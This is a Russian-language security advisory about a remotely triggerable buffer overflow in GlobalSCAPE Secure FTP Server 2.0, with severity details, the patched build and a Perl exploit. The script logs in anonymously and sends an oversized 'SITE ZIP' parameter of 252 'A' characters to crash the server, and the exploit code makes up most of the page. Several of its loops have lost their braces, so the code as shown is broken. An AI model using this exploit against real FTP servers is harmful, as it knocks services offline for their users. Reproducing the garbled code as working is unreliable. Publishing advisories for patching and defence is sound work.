Удаленный отказ в обслуживании против GlobalSCAPE Secure FTP Server

Дата публикации:
19.03.2004
Всего просмотров:
948
Опасность:
Средняя
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Отказ в обслуживании
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
GlobalSCAPE Secure FTP Server 2.x
Уязвимые версии: GlobalSCAPE Secure FTP Server 2.0 Build 03.11.2004.2

Описание: Переполнение буфера обнаружено в GlobalSCAPE Secure FTP Server. Удаленный авторизованный пользователь может аварийно завершить работу сервера.

Удаленный авторизованный пользователь может послать специально сформированную команду SITE, с параметром ~252 байта, чтобы перезаписать память и аварийно завершить работу сервера.

Пример/Эксплоит:

#!/usr/bin/perl

use IO::Socket;

$host = "192.168.1.243";

$remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host, 
PeerPort => "2117");

unless ($remote) { die "cannot connect to ftp daemon on $host" }

print "connected\n";
while (<$remote>)
 
 print $_;
 if (/220 /)
 {
  last;
 }
 

$remote->autoflush(1);

my $ftp = "USER anonymous\r\n";

print $remote $ftp;
print $ftp;
sleep(1);

while (<$remote>)
 
 print $_;
 if (/331 /)
 {
  last;
 }
 

$ftp = join("", "PASS ", "a\@b.com", "\r\n");
print $remote $ftp;
print $ftp;
sleep(1);

while (<$remote>)
 
 print $_;
 if (/230 /)
 {
  last;
 }
 

$ftp = join ("", "SITE ZIP /d:", "A"x(252), "\r\n");

print $remote $ftp;
print $ftp;
sleep(1);

while (<$remote>)
 
 print $_;
 if (/250 Done/)
 {
  last;
 }
 

close $remote;

URL производителя: http://www.cuteftp.com/gsftps/

Решение:Установите обновленную версию программы (2.0 Build 03.16.2004.1)

Ссылки: GlobalSCAPE Secure FTP Server Buffer Overflow (Parameter Handling)

или введите имя

CAPTCHA